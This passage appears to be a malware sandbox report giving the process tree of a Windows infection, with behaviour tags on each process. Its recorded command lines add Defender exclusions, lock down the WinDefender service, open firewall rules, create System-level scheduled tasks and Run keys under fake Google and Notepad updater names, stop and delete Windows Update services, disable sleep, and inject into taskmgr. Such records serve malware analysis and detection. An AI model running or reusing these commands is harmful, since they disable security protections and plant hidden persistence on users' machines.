            - Executes dropped EXE
            - Drops file in Program Files directory
            - Suspicious behavior: EnumeratesProcesses
        [5] C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe (PID 4828)
            cmd: "C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe (PID 4852)
              cmd: "C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"
              - Executes dropped EXE
              - Checks SCSI registry key(s)
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious behavior: MapViewOfSection
        [5] C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe (PID 4308)
            cmd: "C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (PID 4788)
              cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe (PID 3316)
            cmd: "C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Drops file in Drivers directory
            - Executes dropped EXE
            - Drops file in Program Files directory
            - Suspicious behavior: EnumeratesProcesses
        [5] C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe (PID 1472)
            cmd: "C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
            - Executes dropped EXE
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4040)
              cmd: powershell -nologo -noprofile
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe (PID 2496)
              cmd: "C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"
              - Windows security bypass
              - Executes dropped EXE
              - Windows security modification
              - Adds Run key to start application
              - Checks for VirtualBox DLLs, possible anti-VM trick
              - Drops file in Windows directory
              - Modifies data under HKEY_USERS
            [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4496)
                cmd: powershell -nologo -noprofile
                - Drops file in System32 directory
                - Modifies data under HKEY_USERS
            [7] C:\Windows\System32\cmd.exe (PID 4140)
                cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              [8] C:\Windows\system32\netsh.exe (PID 3948)
                  cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                  - Modifies Windows Firewall
            [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2188)
                cmd: powershell -nologo -noprofile
                - Drops file in System32 directory
                - Modifies data under HKEY_USERS
            [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2680)
                cmd: powershell -nologo -noprofile
                - Drops file in System32 directory
                - Modifies data under HKEY_USERS
              [8] C:\Windows\System32\Conhost.exe (PID 4976)
                  cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            [7] C:\Windows\rss\csrss.exe (PID 4900)
                cmd: C:\Windows\rss\csrss.exe
                - Executes dropped EXE
                - Adds Run key to start application
                - Manipulates WinMonFS driver.
                - Drops file in Windows directory
              [8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4700)
                  cmd: powershell -nologo -noprofile
                  - Drops file in System32 directory
                  - Modifies data under HKEY_USERS
              [8] C:\Windows\SYSTEM32\schtasks.exe (PID 1656)
                  cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  - Creates scheduled task(s)
              [8] C:\Windows\SYSTEM32\schtasks.exe (PID 4872)
                  cmd: schtasks /delete /tn ScheduledUpdate /f
              [8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1332)
                  cmd: powershell -nologo -noprofile
              [8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1300)
                  cmd: powershell -nologo -noprofile
                  - Drops file in System32 directory
                  - Modifies data under HKEY_USERS
              [8] C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe (PID 3320)
                  cmd: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                  - Executes dropped EXE
              [8] C:\Windows\SYSTEM32\schtasks.exe (PID 5068)
                  cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  - Creates scheduled task(s)
              [8] C:\Windows\windefender.exe (PID 3824)
                  cmd: "C:\Windows\windefender.exe"
                  - Executes dropped EXE
                [9] C:\Windows\SysWOW64\cmd.exe (PID 1084)
                    cmd: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                  [10] C:\Windows\SysWOW64\sc.exe (PID 4164)
                       cmd: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                       - Launches sc.exe
              [8] C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe (PID 3400)
                  cmd: C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
                  - Executes dropped EXE
                [9] C:\Windows\System32\Conhost.exe (PID 2664)
                    cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                [9] C:\Windows\SYSTEM32\schtasks.exe (PID 3264)
                    cmd: schtasks /delete /tn "csrss" /f
                [9] C:\Windows\SYSTEM32\schtasks.exe (PID 4256)
                    cmd: schtasks /delete /tn "ScheduledUpdate" /f
        [5] C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe (PID 720)
            cmd: "C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"
            - Executes dropped EXE
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (PID 2244)
              cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (PID 4556)
              cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (PID 3776)
              cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              - Suspicious use of AdjustPrivilegeToken
        [5] C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe (PID 1620)
            cmd: "C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Drops file in Drivers directory
            - Executes dropped EXE
            - Drops file in Program Files directory
    [3] C:\Users\Admin\AppData\Local\Temp\XandETC.exe (PID 3636)
        cmd: "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Executes dropped EXE
        - Drops file in Program Files directory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2316)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5068)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3356)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4984)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3208)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  [2] C:\Windows\System32\cmd.exe (PID 4264)
      cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 3928)
        cmd: powercfg /x -hibernate-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 4256)
        cmd: powercfg /x -hibernate-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 3320)
        cmd: powercfg /x -standby-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 1020)
        cmd: powercfg /x -standby-timeout-dc 0
  [2] C:\Windows\System32\cmd.exe (PID 164)
      cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    [3] C:\Windows\System32\sc.exe (PID 4736)
        cmd: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 4976)
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 984)
        cmd: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2688)
        cmd: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 3560)
        cmd: sc stop dosvc
        - Launches sc.exe
    [3] C:\Windows\System32\reg.exe (PID 4124)
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    [3] C:\Windows\System32\reg.exe (PID 4328)
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    [3] C:\Windows\System32\reg.exe (PID 3640)
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        - Modifies security service
    [3] C:\Windows\System32\reg.exe (PID 4896)
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    [3] C:\Windows\System32\reg.exe (PID 4876)
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  [2] C:\Windows\System32\cmd.exe (PID 3372)
      cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    [3] C:\Windows\System32\sc.exe (PID 3360)
        cmd: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 4736)
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 1416)
        cmd: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 616)
        cmd: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2500)
        cmd: sc stop dosvc
        - Launches sc.exe
  [2] C:\Windows\System32\cmd.exe (PID 716)
      cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 640)
        cmd: powercfg /x -hibernate-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 4252)
        cmd: powercfg /x -hibernate-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 1588)
        cmd: powercfg /x -standby-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 4912)
        cmd: powercfg /x -standby-timeout-dc 0
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4976)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1440)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
    [3] C:\Windows\system32\schtasks.exe (PID 3820)
        cmd: "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
  [2] C:\Windows\System32\schtasks.exe (PID 4556)
      cmd: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  [2] C:\Windows\System32\cmd.exe (PID 5092)
      cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    [3] C:\Windows\System32\sc.exe (PID 4896)
        cmd: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 4812)
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 4072)
        cmd: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 4248)
        cmd: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2056)
        cmd: sc stop dosvc
        - Launches sc.exe
  [2] C:\Windows\System32\cmd.exe (PID 4164)
      cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    [3] C:\Windows\System32\sc.exe (PID 608)
        cmd: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2532)
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 4076)
        cmd: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 164)
        cmd: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2396)
        cmd: sc stop dosvc
        - Launches sc.exe
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4288)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  [2] C:\Windows\System32\cmd.exe (PID 644)
      cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\Conhost.exe (PID 4252)
        cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    [3] C:\Windows\System32\powercfg.exe (PID 4764)
        cmd: powercfg /x -hibernate-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 4916)
        cmd: powercfg /x -hibernate-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 720)
        cmd: powercfg /x -standby-timeout-ac 0
        - Suspicious use of SetThreadContext
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\powercfg.exe (PID 3852)
        cmd: powercfg /x -standby-timeout-dc 0
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4316)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  [2] C:\Windows\System32\cmd.exe (PID 5088)
      cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 2824)
        cmd: powercfg /x -hibernate-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 4352)
        cmd: powercfg /x -hibernate-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 4256)
        cmd: powercfg /x -standby-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 2708)
        cmd: powercfg /x -standby-timeout-dc 0
  [2] C:\Windows\System32\schtasks.exe (PID 4932)
      cmd: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  [2] C:\Windows\System32\schtasks.exe (PID 1300)
      cmd: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3080)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4052)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
  [2] C:\Windows\System32\cmd.exe (PID 4516)
      cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
    [3] C:\Windows\System32\sc.exe (PID 1836)
        cmd: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 4740)
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2072)
        cmd: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 5036)
        cmd: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 4132)
        cmd: sc stop dosvc
        - Launches sc.exe
  [2] C:\Windows\System32\cmd.exe (PID 4248)
      cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 3576)
        cmd: powercfg /x -hibernate-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 2664)
        cmd: powercfg /x -hibernate-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 4408)
        cmd: powercfg /x -standby-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 4640)
        cmd: powercfg /x -standby-timeout-dc 0
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4420)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4928)
      cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
  [2] C:\Windows\System32\cmd.exe (PID 2276)
      cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 4736)
        cmd: powercfg /x -hibernate-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 1084)
        cmd: powercfg /x -hibernate-timeout-dc 0
    [3] C:\Windows\System32\powercfg.exe (PID 2400)
        cmd: powercfg /x -standby-timeout-ac 0
    [3] C:\Windows\System32\powercfg.exe (PID 1020)
        cmd: powercfg /x -standby-timeout-dc 0
  [2] C:\Windows\System32\cmd.exe (PID 3560)
      cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    [3] C:\Windows\System32\sc.exe (PID 2668)
        cmd: sc stop UsoSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 2708)
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 3812)
        cmd: sc stop wuauserv
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 4932)
        cmd: sc stop bits
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe (PID 4060)
        cmd: sc stop dosvc
        - Launches sc.exe
    [3] C:\Windows\System32\reg.exe (PID 672)
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    [3] C:\Windows\System32\reg.exe (PID 4152)
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    [3] C:\Windows\System32\reg.exe (PID 4408)
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    [3] C:\Windows\System32\reg.exe (PID 3356)
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    [3] C:\Windows\System32\reg.exe (PID 4704)
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  [2] C:\Windows\System32\conhost.exe (PID 2400)
      cmd: C:\Windows\System32\conhost.exe
  [2] C:\Windows\explorer.exe (PID 4164)
      cmd: C:\Windows\explorer.exe
  [2] C:\Windows\System32\conhost.exe (PID 1084)
      cmd: C:\Windows\System32\conhost.exe zuhwtyqtfkk
      - Suspicious use of NtCreateUserProcessOtherParentProcess
  [2] C:\Windows\System32\cmd.exe (PID 1752)
      cmd: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
    [3] C:\Windows\System32\Wbem\WMIC.exe (PID 1332)
        cmd: wmic PATH Win32_VideoController GET Name, VideoProcessor
        - Drops file in System32 directory
        - Detects videocard installed
        - Modifies data under HKEY_USERS
  [2] C:\Windows\System32\cmd.exe (PID 5000)
      cmd: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
  [2] C:\Windows\System32\conhost.exe (PID 4104)
